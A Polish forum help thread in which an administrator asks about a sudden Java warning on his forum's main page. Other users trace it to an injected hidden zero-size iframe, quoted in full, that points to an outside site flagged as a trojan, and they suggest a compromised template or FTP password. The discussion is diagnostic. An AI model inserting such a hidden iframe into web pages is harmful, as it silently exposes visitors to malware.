Skocz do zawartości
  • 0
Zaloguj się, aby obserwować  
Arek528

Problem z Java

Pytanie

Witam, wczoraj  znienacka pod wieczór zaczął wyskakiwać taki komunikat. iuxu.jpg Nie jest to tylko u mnie. Aktualizacja javy nie pomogła, nic nie grzebałem w trybie bezpiecznym jak i na skinie oryginalnym też to wyskakuje. Widzieliście taką hecę ? Nie mam nawet pomysłu od czego zacząć poszukiwania.

Edytowano przez Arek528

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

12 odpowiedzi na to pytanie

Polecane posty

  • 0

Syfy się instalują same... Jak komunikat pokazuje problemem jest image-speed a dokładniej to:

<iframe src="http://image-speed.pl/iframe/index.html" width="0" height="0"></iframe>

umieszczacie takie coś a później się dziwicie. Mi antyvir zgłasza, że jest to trojan więc...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

To jest tylko i wyłącznie na stronie głównej forum :Thinking: Nie wiem czemu ten link służy.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Taa miałem to samo, ale po 2 dniach zniknęło, bez podjęcia żadnych kroków, na wielu forach IPB jest takowy komunikat..

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Ale jaki? popraw screen to jakoś rozwiążemy problem. i chyba nie Java a JavaScript ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Ale forum nie korzysta z appletów Java więc to raczej coś musiałeś doinstalować albo jakiś syf masz

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Przez tydzień nie wchodziłem na forum, a nikt prócz mnie nie może nic wrzucić po powrocie z szpitala przeglądałem sobie forum i to wyskoczyło od tak znienacka.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Dzięki ale jakim cudem to się tam znalazło to naprawdę nie mam pojęcia. Lewych modów nie instaluję więc skąd to się wzięło... Orientujesz się czy IPS jest skłonny do przejrzenia skryptu czy nie ma czasem jakichś dziur ? Czy tylko Bug Tracker zostaje.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Taki kod mogłeś wstawić w szablonie albo coś. IPS się tym nie zajmuje bo to błąd zabezpieczeń serwera może być lub słabe hasło do ftp itp

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
  • 0

Ok. Dzięki za pomoc muszę przejrzeć forum i zgłosić się do hosta.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość
Temat jest zablokowany i nie można w nim pisać.
Zaloguj się, aby obserwować  

  • Kto przegląda   0 użytkowników

    Brak zalogowanych użytkowników przeglądających tę stronę.

×

Ważne informacje

Kontynuując przeglądanie strony, wyrażasz zgodę na używanie przez nas plików cookies.